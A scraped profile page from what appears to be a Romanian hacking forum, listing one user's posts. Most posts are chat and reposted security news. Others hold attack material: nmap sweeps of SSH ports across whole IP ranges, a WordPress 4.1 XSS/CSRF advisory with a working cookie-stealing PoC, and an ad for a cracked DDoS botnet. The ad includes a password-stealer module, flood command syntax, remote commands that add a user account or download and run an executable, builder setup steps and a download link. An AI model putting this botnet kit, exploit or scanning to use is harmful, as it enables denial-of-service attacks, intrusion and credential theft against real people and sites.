Jump to content

htmanpro

Members
  • Posts

    39
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by htmanpro

  1. Ho, gata! Si-a incercat si el norocu ce vreti acuma=))?
  2. De ce pula mea cenzurezi? On: Nu este permisa vanzarea/schimbarea/s.a.m.d ce implica rooturi
  3. htmanpro

    14/88

    Stai calm, nici ei nu te suporta pe tine:D! On: BUn venit
  4. htmanpro

    Ramas Bun RST

    Amante de intretinut.... On: Mane, eu nu te cunosc asa bine dar vizitez forumu de 1-2 ani ca guest si am vazut ca esti activ ai posturi utile, esti un membru de baza pe aici..Sper ca poate o sa revii vreodata..
  5. nmap -p 22 24.1.*.* -oN fisier.txt sau altfel nmap -p 22 24.5.0.1/16 -oS fisier.txt SAu nmap -p 22 24.1.0-255.1-254 -oN fisier.txt
  6. Document Title: =============== Wordpress 4.1 - XSS & CSRF Web Vulnerability Release Date: ============= 2014-12-30 Product & Service Introduction: =============================== https://wordpress.org/ Abstract Advisory Information: ============================== The Hackyard Security Group pentest team discovered a cross site request forgery issue and a cross site vulnerability in the Wordpress 4.1 Vulnerability Disclosure Timeline: ================================== 2014-12-27: Author Notification (0x0A) 2014-12-30: Public Disclosure Discovery Status: ================= Published Affected Product(s): ==================== Product: Wordpress 4.1 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A client-side cross site request forgery issue and a cross site scripting vulnerability has been discovered in the Wordpress version 4.1 The client-side cross site request forgery vulnerability allows remote attackers to force client-side requests to execute application functions. The client-side cross site scripting vulnerability allows remote attackers to inject malicious script codes to compromise administrator session data. The XSS vulnerability is located in comment values of the wp-comments-post.php file POST method request. Remote attackers are able to inject malicious script codes to the client-side application request. The CSRF vulnerability is located in the same value request and allows to request the account session data. Both issues are only exploitable on the client-side of the application and the request method to inject is POST. The security risk of the client-side web vulnerability is estimated as medium with a CVSS (common vulnerability scoring system) count of 2.5. Exploitation of the client-side web vulnerability requires no privileged web-application user account and low or medium user interaction. Successful exploitation of the vulnerabilities result in non-persistent phishing mails, session hijacking, non-persistent external redirect to malicious sources and client-side manipulation of affected or connected module context. Request Method(s): [+] POST Vulnerable Module(s): [+] comment Vulnerable Parameter(s): [+] comment= Affected Module(s): [+] wp-comments-post.php Proof of Concept (PoC): ======================= The client-side cross site request forgery issue and a cross site scripting vulnerability can be exploited by remote attackers with low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerabilities: You can use the following exploit code to verify the vulnerability. Save the code as .html. The malicious page needs to be surfed by a non expired administrator session to take over the user session data. PoC: wp-comments-post.php <html> <!-- CSRF PoC - generated by **0x0A** --> <body> <form action="http://127.0.0.1/wordpress/wp-comments-post.php" method="POST"> <input type="hidden" name="author" value="Pentest" /> <input type="hidden" name="email" value="pentest@hackyard.net" /> <input type="hidden" name="url" value="https://hackyard.net" /> <input type="alert" name="comment" value="<script>alert(document.cookie);</script>" /> <input id="submit" class="submit" type="submit" value="Post Comment" name="submit"> <input id="comment_post_ID" type="hidden" value="8" name="comment_post_ID"> <input id="comment_parent" type="hidden" value="0" name="comment_parent"> <input id="_wp_unfiltered_html_comment_disabled" type="hidden" value="d1a069167f" name="_wp_unfiltered_html_comment"> </form> </body> </html> Reference(s):Video ====================== LINK: https://www.youtube.com/watch?v=UD-iwqphWlk POC: https://www.youtube.com/watch?v=HL7ETe3A4Wg Solution - Fix & Patch: ======================= 2014-11-24: Filtering an html comments Security Risk: ============== The security risk of the cross site request forgery and cross site scripting vulnerability is estimated as medium. (CVSS 2.5) Credits & Authors: ================== Neo Hapsis aka 0x0A- Information Security Researcher [https://hackyard.net] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Hackyard Security Group disclaims all warranties, either expressed or implied, including the warranties of merchant ability and capability for a particular purpose. Hackyard Security Group or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Hackyard Security Group or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: https://hackyard.net Contact: admin@hackyard.net Facebook: facebook.com/Hackyard.net YouTube: youtube.com/user/HackyardSG Any modified copy or reproduction, including partially usages, of this file requires authorization from Hackyard Security Group. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Hackyard Security Group or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of Hackyard Security Group & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@hackyard.net) to get a permission. Source: hk
  7. Features - Written in c + +, easily crypt is lightweight (compressed sample <15KB) - Full compatibility with all windows family (x86 and x64) - Bot has 7 types of attacks - Extremely stable system. Load on CPU and ram is very powerful. - does not attract attention to UAC Windows Firewall - can install port, referal and cookies individually for each attack - Supports up to 10 targets simultaneously - has a very low load on the cpu with the new, complex system parsing Teams (all analogs parsing passes within a function in multiple threads - it's extra work load on the processor. New bot enters all data in the array before the attack and come ready function parameters: address, port, referral, etc.) - has enormous power output of more than 1500 http (and more 30,000 udp) requests per minute due to direct interaction with network drivers, even on Windows Desktop! (Only when using winsock) is about 10 times more than some analogues and several more top (on this indicator) competitors. - in the control panel are: the number of requests per minute, right in the system, the version of the system. - Supports bypassing Cloudflare protection (!) and many other, more simple. - support and slow get slow post! mode - indicated in the packet header off the cache (cache-control: no-cache), which increases the load on the server. - Bot protection of panel. Modules: - PassGrabber (stealer): this module find and decrypt passwords. 26 software units supported (on octouber 2014). price $150 for base licence, $250 for lite licence, free for full. Detection: Validation build (without crypt and packing) only 3 AV’s of all triggered suspicion (avira, clamav, vba32). during local tests Kaspersky, nNod32, Drweb, Avast all missed file in 100% of cases. Attack modes and commands: As the system is a professional syntax with commands, this seems complicated, but only at first glance =) • dd1 basic operation by http protocol method get, using sokkety. support *** cookies and $ $ $ ref and allows up to 10 targets simultaneously (separated by ";"). the fastest search volume attack. Example: DD1 = ?????? cookies *** $ $ $ referal; http://mail.ru cookies2 *** $ $ $ referal2 • dd2 the same treatment as dd1, only the method of post. added optional parameter @ @ @ post_data. also supports up to 10 goals. Example: dd2 = ????? ?.?.?. - ??????? ??????? ??????, ???????????? ??????? PHP, MySQL ? Perl. ????????? ??????????? ??????? ?? ????????? ?????. ??????? ????? ?? *** cookies $ $ $ referal @ @ @ login = yyy & password = hhh, this team posted a username and password yyy hhh a script • dd3 attack http get method using the system library wininet.dll. good old attack used in many delphi bots. slow due to the limitations of desktop windows. not support the referral and cookies, supports up to 10 targets. Example: dd3 = http://host.com/script.php • dd4 attack http post method using the system library wininet. the same as dd3, only post. Example: DD4 = @ @ @ http://host.com/script.php @ @ @ = login & password = yyy hhh • dd5 icmp attack (pings). supports up to 10 targets. Example dd5 = 198.168.0.1; 199.0.0.1 • dd6 udp attack. supports up to 10 targets. mandatory parameters: port and text. Example: dd6 = 192.168.0.2:27015 @ @ @ flud_text • dd7 attack http get method using the system library urmon.dll average speed attack, supports up to 10 targets and does not support cookies and referal • cfa command bypass the security cloudflare (!). used only during dd7. This is simple - the bot executes java script gets the desired cookie and cloudflare considers requests made dd7 authorized. Example: dd7 = ???? ???? ? ?????????, then (after fifteen minutes) cfa = ???? ???? ? ????????? • cmd command is executed on the command interpreter cmd.exe on the local machine. does not stop the execution of other commands. Example: cmd = net user goodwin / add • exe command to load and run the exe file. does not stop the execution of other commands. file will be saved under the same name, under which he was on the Internet. made three attempts to download a file. Example: exe = http://site.com/filename.exe Control Panel: We used a modified ~ 70% from another complex (purchased under agreements to resell and change), rewriting it almost completely, as it was found too many mistakes and did not like the code. Naturally everything was corrected and optimized - new pu you like it! Demonstration: how well the system is very powerful and to demonstrate the need 15-20 bots, which are always available - Sellers will try to demonstrate power. Prices: - Test License $0 (only for checking the forums and testers. updates not provided) - Lite Licence $300 (update/rebuild $100, upgrade to the new version $ 100) - Basic License $500 (Update / Rebuild $ 50 upgrade to the new version $ 100, the price of the modules will be installed later) - full license $950 (all updates Rebuild and modules are free) INSTRUCTIONS: 1) Setup panel, read the howto included. (PS: Your MasterKey is: 0x2222) 2) Open the builder (do not open "madnesscracked.exe) 3) Write in URL in the builder, the url are usually http://yourdomain.com/index.php 4) Click Update URL, should display a messagebox that the url has been changed. 5) Your file is madnesscracked.exe (after you update url) Downlaod: https://mega.co.nz/#!y85BkRzQ!b9mXFMehpzHGqxluTuMg_p8hh7oGAza9S1m8HxvPaqQ SourcE: trojanforge
  8. Salut, eu împreun? cu un prieten(SmartFX) ne-am apucat de creearea temelor wordpress ?i teme pentru alte platforme, template-uri html..Am "reu?it" s? modific?m o tem? imaginile+ unele scripturi+ css(Nu am creat-o de la 0 deoarece nu ?tim PHP). Demo Screenshoot -Tema este gratuit?! -PSD-urile(background/logo) se g?sesc în fi?ierul "images"! Download: Zippyshare.com - hitsmart-design.rar https://www.sendspace.com/file/8n5416 A?tept?m p?reri ?i critici!
  9. Pai ai instalat vrun addon "infectat" cu reclama aceea incearca sa le dezinstalezi pe toate sa vezi de la care e si dupa baga ce iti trebuie nu baga toate extensile de cacat!
  10. htmanpro

    [XSS] ESET NOD32

    Felicitari, frate! Din reward ne dai cate o bere de iese ceva:))
  11. nu ai bagat parola de la stealer si in config!
  12. Astronaut Barry Wilmore asked for a ratcheting socket wrench Astronauts on the International Space Station have used their 3-D printer to make a wrench from instructions sent up in an email. It is the first time hardware has been "emailed" to space. Nasa was responding to a request by ISS commander Barry Wilmore for a ratcheting socket wrench. Previously, if astronauts requested a specific item they could have waited months for it to be flown up on one of the regular supply flights. Mike Chen, founder of Made In Space, the company behind the 3-D printer, said: "We had overheard ISS Commander Barry Wilmore (who goes by "Butch") mention over the radio that he needed one, so we designed one in CAD and sent it up to him faster than a rocket ever could have." Mr Wilmore installed the printer on the ISS on 17 November. On 25 November he used the machine to fabricate its first object, a replacement part for the printer. Nasa says the capability will help astronauts be more self-reliant on future long duration space missions. Mike Chen added: "The socket wrench we just manufactured is the first object we designed on the ground and sent digitally to space, on the fly. "It also marks the end of our first experiment—a sequence of 21 prints that together make up the first tools and objects ever manufactured off the surface of the Earth." The other 21 objects were designed before the 3D printer was shipped to the space station in September on a SpaceX Dragon supply flight. line Analysis: David Shukman, BBC science editor If a 3D printer can churn out something as useful as a tool in space, what else is possible? Spare parts, components, even equipment, according to the company behind the printer, Made In Space. And that's just the start. As one might expect from an energetic Silicon Valley start-up, the vision is mind-boggling. Already it plans to send a larger 3D manufacturing machine into orbit next year. The ambition is for Nasa or other space agencies or companies to routinely send their printing orders up to the International Space Station and for a range of objects to be produced. This would open the way to create hardware not only for the ISS itself but also for equipment to be deployed beyond it, conceivably such as satellites. And, looking further ahead, the thinking becomes even more radical. Made In Space says it's been trying out possible raw materials for its printers including a substance similar to lunar soil. So in theory, a 3D printer despatched to the Moon might be able to dig into the lunar surface, scoop up what is called the regolith, and transform it into the elements needed for a moon base. That prospect is extremely distant, obviously. For the moment, the astronauts on board the ISS will be happy to know that if they need a new spanner, they can make one in under an hour. Source
  13. This is the first time automatic updates have been sent to Mac computers around the world Apple has sent out its first automatic security update for Mac computers as researchers warn about new bugs. Previously Apple has released security patches through its regular software update system which requires user approval. The latest bugs were so severe it felt it needed to get customers protected immediately, the firm said. "The update is seamless. It doesn't even require a restart," Apple spokesman Bill Evans told Reuters. The Mac bugs were mentioned in security bulletins issued last week by the Department of Homeland Security and the Carnegie Mellon University Software Engineering Institute. It identified dozens of technology companies, including Apple, whose products might be vulnerable. The vulnerability targets a component of its OS X operating system called the network time protocol (NTP) which is used for synchronising clocks on computer systems. The protocol is a global method of synchronising time over a network and has previously been exploited by hackers. Microsoft has been offering automatic updates for security flaws for some time. Apple developed technology for automatically pushing out security updates two years ago but has never previously used it. The firm said that it did not know of any cases where hackers had exploited the bug. Source
  14. Attackers can infect MacBook computers with highly persistent boot rootkits by connecting malicious devices to them over the Thunderbolt interface. The attack, dubbed Thunderstrike, installs malicious code in a MacBook's boot ROM (read-only memory), which is stored in a chip on the motherboard. It was devised by a security researcher named Trammell Hudson based on a two-year old vulnerability and will be demonstrated next week at the 31st Chaos Communication Congress in Hamburg. "It is possible to use a Thunderbolt Option ROM to circumvent the cryptographic signature checks in Apple's EFI firmware update routines," Hudson said in the description of his upcoming presentation. "This allows an attacker with physical access to the machine to write untrusted code to the SPI flash ROM on the motherboard and creates a new class of firmware bootkits for the MacBook systems." Malicious code installed in the MacBook boot ROM will be executed before the OS is loaded, meaning it can patch the OS kernel and have complete control over the system. It also means that reinstalling Mac OS X will not remove the bootkit and neither will replacing the hard disk drive, because the malicious code is not stored on it. The bootkit can even replace Apple's cryptographic key stored in the ROM with one generated by the attacker, preventing any future legitimate firmware updates from Apple, the researcher said in a blog post. Firmware updates are supposed to be signed, but the vulnerability exploited by this attack allows that mechanism to be bypassed. "Additionally, other Thunderbolt devices' Option ROMs are writable from code that runs during the early boot and the bootkit could write copies of itself to new Thunderbolt devices," the researcher said. "The devices remain functional, which would allow a stealthy bootkit to spread across air-gap security perimeters through shared Thunderbolt devices." This worm-like spreading capability is similar to that of BadUSB, a stealthy malware attack demonstrated earlier this year at the Black Hat security conference that can infect the firmware of USB devices and then use them to compromise other computers. Security researchers have also previously demonstrated methods to bypass Secure Boot, a security mechanism of the Unified Extensible Firmware Interface (UEFI) -- the BIOS replacement in modern computers -- in order to install bootkits. Source
  15. Sony has asked Twitter to suspend the account of a person who is alleged to have posted internal company documents and information released by hackers. Twitter has also been asked to destroy the "stolen" documents that are in its possession or control. A letter sent Monday by Sony Pictures Entertainment's attorney David Boies to Twitter General Counsel Vijaya Gadde, and obtained by some news services, claimed that someone using the Twitter handle @bikinirobotarmy is in possession of, and is using the account to publish "stolen documents and information" from the recent hack. Sony Pictures was hacked in late November and a variety of information, including corporate, employee data and unreleased movies were leaked. Some leaked emails of executives have proven to be particularly embarrassing for the company. The FBI has said North Korea was responsible for the hack, which came ahead of the release by Sony of a comedy movie about a plot to assassinate the country's leader Kim Jong Un. The Twitter account Sony wants suspended belongs to Val Broeksmit, who describes himself on his website as a person who "writes records, mixes and masters his own music." Broeksmit said on Monday that Twitter had forwarded to him the letter from Boies. The attorney had asked Twitter to hand over a copy of his letter to Broeksmit and ask him to cease publication of the information on Twitter. In a telephone interview, Broeksmit said he had tweeted the "silly, stupid stuff" that he thought was already in the public domain, and did not tweet any sensitive corporate information that could damage Sony. The musician had tweeted, for example, an email that suggested that Sony paid an actor to tweet about films. t's absurd that Sony is going after me," he said. "They keep making mistakes." Broeksmit said he hadn't yet decided whether he would back down to Sony's demand or hire a lawyer. "SPE does not consent to Twitter's or any Twitter account holder's possession, review, copying, dissemination, publication, uploading, downloading, or making any use of the Stolen Information, and to request your cooperation in suspending the Account Holder's Twitter account and the account of any other user seeking to disseminate the Stolen Information via Twitter," Boies wrote in the letter. Twitter has previously suspended accounts of users publishing the confidential information, which was acknowledged by Boies in his letter. Citing Twitter's prohibition in its terms of service on the unauthorized publication of copyrighted material and other people's private and confidential information, or the use of Twitter for illegal purposes, Sony has threatened to hold Twitter responsible for damages or losses to Sony, if the account is not suspended and the information continues to be disseminated. "SPE will have no choice but to hold Twitter responsible for any damage or loss arising from such use or dissemination by Twitter, including any damages or loss to SPE or others, and including, but not limited to, any loss of value of intellectual property and trade secrets resulting from Twitter's actions," Boies wrote. Twitter spokesman Jim Prosser said the company had received the letter on Monday afternoon, but did not comment on the letter or indicate whether it planned to suspend the account. Boies had previously written to some news outlets to warn them that they weren't allowed to use stolen information, threatening them with possible responsibility for damages incurred by Sony in connection with the reports. John Ribeiro covers outsourcing and general technology breaking news from India for The IDG News Service. Follow John on Twitter at @johnribeiro. John's e-mail address is john_ribeiro@idg.com
  16. Mul?umesc, acu m? apuc de ele!
  17. @SilenTx0 Îmi po?i recomanda o carte, site, ceva?
  18. It’s up to each of us to be proactive about security and privacy; it’s risky to trust a company to manage your privacy in a manner that benefits you the most and not them. If you could have a browser that offered security, privacy and speed for free, then why not try it? WhiteHat Security originally developed Aviator as the company’s in-house browser, but eventually released Aviator web browser in two flavors, OS X and Windows. It is billed as “the web’s most secure and private browser.” Users simply install the browser and it’s setup to maximize privacy and security safeguards by default. Unlike Chrome or Firefox, you don’t need to get add-ons or extensions to configure privacy and security. Those protections are built into Aviator, but since the browser uses open-source Chromium code, it does support “tens of thousands of extensions.” Unlike Google with Chrome, Microsoft with Internet Explorer and even Mozilla with Firefox, which profit from online advertising, WhiteHat has no advertising partners and does not sell your data. You are not a product being sold in exchange for free software. Aviator comes configured with the Disconnect extension, meaning bye-bye “privacy-destroying tracking.” Aviator’s search engine choices also come with Disconnect, meaning you are using a “privacy-enhanced default search engine.” It also comes with the User-Agent Switcher extension; websites identify browsers by user agents, but this extension allows you to appear as if you are browsing via Chrome, IE, iOS, Android, Windows Phone, Firefox, Opera or Safari. When you surf to a page that contains cookies, you will see cookies with a red X on it, which indicates “This page was prevented from setting cookies.” Plugin has a similar red X, blocked on the page by default, but you have options to always allow the plug-in, run plug-in this time, and manage plug-ins. The security and privacy benefits are why I like Aviator. The browser launches in “protected” (private) mode, protecting your privacy by default by not logging your history, cookies, or browser cache. Ads and other hidden online trackers are blocked; this also protects you from malvertising (malicious advertising). Third-party cookies are also not allowed and Aviator automatically cleans locally stored data when you exit the browser. In WhiteHat’s words, “There is no need to constantly make it your mission to keep from being invisibly tracked and spied on.” Why are Ghostery, Adblock Plus or Privacy Badger not also default extensions? Robert Hansen, aka @RSnake, Vice President of WhiteHat Security’s WhiteHat Labs was kind enough to answer my questions. Robert Hansen: Ghostery and Privacy Badger are mostly redundant, and Adblock Plus allows ads from companies like Google, which totally defeats the purpose of the software. But if you want a feature from one of those plugins or feel that Disconnect is missing something, yes, of course you can install any plugin you like. Are there any plans for Aviator to be offered as a mobile browser for iOS or Android? Robert Hansen: It's unlikely in the near term. Though, that is always an option. The major hurdle is actually the manufacturers who don't like mobile browsers. Might you offer a security/privacy-minded suggestion for a mobile browser? Robert Hansen: Disconnect offers similar functionality to their browser extension on mobile - that is probably the best option available, though not as feature rich from a privacy/security standpoint as Aviator is which combines their technology with a number of our own techniques. You can find more about Disconnect here; the free mobile app for iOS can be downloaded from iTunes and from Google Play for Android where it is lovely to see “Disconnect Search does not require any special permissions.” (There is also a Disconnect Secure Wireless app.) If you are curious how Aviator stacks up against other browsers in a simple HTML5 test, then Aviator scored 492 out of 555 points, compared to 475 using Firefox 34, 512 using Chrome 39, 376 using IE 11 and 429 using Safari 8. Source
  19. The simplest explanation for North Korea's suddenly dropping off the Internet was a distributed denial-of-service (DDoS) attack that overwhelmed the isolated nation's tenuous connection to the rest of the world, experts said Monday. North Korea's Internet connection went down around 11 a.m. ET Monday, and was restored about nine and a half hours later, at approximately 8:45 p.m. ET. But within hours, some sites checked by Computerworld, including North Korea's official news agency, were again offline. A DDoS attack could have been launched by a small group or even an individual, the researchers said. "If it turns out it was an attack, I'd be far more surprised if it was a government launching the attack than I would if it was a kid in a Guy Fawkes mask," said Matthew Prince, co-founder and CEO of security firm CloudFlare, in an email. Prince and others bet that a run-of-the-mill DDoS attack took down North Korea's Internet because the isolated country has a "pipe" to the Internet so narrow that a routine attack could easily flood its capacity and take it offline. Ofer Gayer, security researcher at Incapsula, estimated North Korea's total bandwidth at 2.5 Gbps, far under the capacity of many recent DDoS attacks, which typically are in the 10Gbps to 20Gbps range. "Even if North Korea had ten times their publicly reported bandwidth, bringing down their connection to the Internet would not be difficult from a resource or technical standpoint," Gayer said, also in an email. Almost all of North Korea's Internet traffic passes through a connection provided by China Unicom, the neighboring country's state-owned telecommunications company. North Korea has just a single block of IP (Internet protocol) addresses, or just 1,024 addresses, another vulnerability; in comparison, the U.S. boasts 1.6 billion IP addresses. "When organizations –- nation states or commercial entities -– rely on a single Internet service provider and a small range of IP addresses, they make themselves easy prey," Gayer said. "Attackers have a single target -– the one connection to the Internet backbone –- to flood with traffic." According to Prince of CloudFlare and Jim Cowie, chief scientist at Dyn Research, North Korea -- officially named the Democratic People's Republic of Korea (DPRK) -- went completely dark after a weekend of intermittent connectivity. For example, Computerworld was unable to reach the DPRK's Central News Agency, its official mouthpiece, much of Sunday, Dec. 21. The IDG News Service, which like Computerworld is owned and operated by IDG, reported Monday that North Korea had fallen off the Internet. North Korea's outage might have gone unreported but for the November hack of Sony Pictures; the release of gigabytes of the Hollywood studio's internal documents; Sony yanking The Interview, a comedy that portrayed the assassination of Kim Jung-un, the country's dictator, after hackers threatened American theaters; and the U.S. government's contention that North Korea was responsible. In comments last week, President Obama said, "We will respond proportionally [to North Korea], and we will respond in a place and time and manner we choose." But it's far more likely that North Korea's connection to the world was severed by hacktivists or cyber terrorists than by the U.S., or any other nation, the researchers said. Dan Holden, the director of Arbor Networks' security engineering and response team, said the attacks were relatively small in scale -- the weekend peak was just shy of 6 Gbps -- and among other targets, took aim at the primary and secondary DNS (domain name system) servers for most websites in North Korea. "It's not as if a super sophisticated attack is needed in order to cripple it," Holden said in a Monday blog. Holden also pointed out that a pair of hacktivist cyber-terrorist groups, Anonymous and Lizard Squad, had taken to Twitter to threaten to attack North Korea. Both groups have used DDoS attacks in the past to knock sites offline. Prince of CloudFlare posed other possibilities, ranging from North Korea purposefully cutting itself off from the Internet -- a move other authoritarian regimes have made, such as Syria -- to China Unicom breaking the connection. But Prince leaned toward the DDoS theory. "Given the largest DDoS attacks are an order of magnitude larger than [North Korea's capability], it is conceivable that an attack saturated the connection and knocked the site offline," Prince said. "It's worth remembering that just a few weeks ago a teenager in the U.K. pleaded guilty for single-handedly generating a 300Gbps attack against Spamhaus." Prince's reference was to the 17-year-old arrested this summer and charged with launching a massive DDoS attack in March 2013 against the anti-spam organization. Cowie of Dyn Research concurred with the other experts who pointed to the flimsiness of North Korea's Internet connection, although like Prince, he said there might have been causes other than a DDoS. "A long pattern of up-and-down connectivity, followed by a total outage, seems consistent with a fragile network under external attack," Cowie said in a Monday blog. "But it's also consistent with more common causes, such as power problems." North Korea did not mention the outage on its news website late Monday before it again went dark, but it did include a rambling 1,700-word missive from the National Defense Commission (NDC), the agency that controls the country's huge military forces. The NDC sharply threatened the U.S. with retaliation if a cyberattack was launched against the DPRK. "The army and people of the DPRK are fully ready to stand in confrontation with the U.S. in all war spaces including cyber warfare space to blow up those citadels," the NDC said in a bellicose statement. "Our toughest counteraction will be boldly taken against the White House, the Pentagon and the whole U.S. mainland, the cesspool of terrorism, by far surpassing the 'symmetric counteraction' declared by Obama." Source
  20. L-am testat, la steam am observat ceva ia decat username-ul(din aplicatie) dar dupa site ia si parola, ets-ul de la yahoo poti sa-l scoti ca e degeaba pentru ca e criptat! On: Imi place, foarte folositor +1!
  21. Hackers who apparently attacked Sony's PlayStation Network (PSN) and Microsoft's Xbox Live on Christmas Day have taken aim at anonymous network Tor. Lizard Squad, which claimed responsibility for the outage , on Friday tweeted, "To clarify, we are no longer attacking PSN or Xbox. We are testing our new Tor 0day." While at least one site that maps the Tor network showed numerous routers with the name "LizardNSA," the extent of any attack was unclear. Tor directs user traffic through thousands of relays to ensure anonymity. In a Dec. 19 blog post, Tor managers warned of a possible attack, saying, "There may be an attempt to incapacitate our network in the next few days through the seizure of specialized servers in the network called directory authorities." Sony engineers, meanwhile, continued to struggle to get PSN back online Friday following the suspected denial-of-service (DDoS) attacks on Thursday. Sony's Twitter account for PSN asked frustrated gamers to be patient as staff worked to get the service back up and running, saying it did not know when PSN would be back online. "We are aware that some users are experiencing difficulty logging into the PSN," Sony said on its PlayStation support page, where the network was listed as offline. In a Twitter post showing a chat with the alleged hackers, MegaUpload founder Kim Dotcom suggested he had convinced Lizard Squad to stop the attacks in return for lifetime memberships on his file-transfer site Mega. Lizard Squad had taken credit for an apparent attack against PSN earlier this month, as well as an attack in August. The incident came at the same time that a U.S. flight carrying Sony Online Entertainment President John Smedley was diverted for security reasons. Xbox Live was back again Friday following disruptions, with core services up and running. Yesterday, some users were unable to sign in to Xbox Live," a Microsoft spokesman said in a statement sent via email. "Our teams worked throughout the holiday to resolve the issue, and Xbox Live core services have now been restored." The company did not elaborate on the cause of the disruption. - Source
  22. Salut, eu sunt htmanpro m? ocup cu "nimic" înc? înv??...Bun, eu m? ocup ?i de photoshop din când în când deoarece sunt pasionat de fotografie dar ?i mai mult de pentesting, ce s? zic despre cuno?tin?ele mele? Sunt încep?tor în linux ?i penetration web app. C? limbaje de programare înv?? C++/C deoarece mi-au vorbit câ?iva oameni ?i mi-au spus c? este foarte bun pentru încep?tori, în paralel cu c++/c mai înv?? despre SQL,Html ?i css care sunt destul de u?oare dup? mine.. Aici am venit ca s? înv?? cât mai multe despre securitatea web dar ?i s? împart cuno?tin?ele mele cu cei ce au nevoie!
×
×
  • Create New...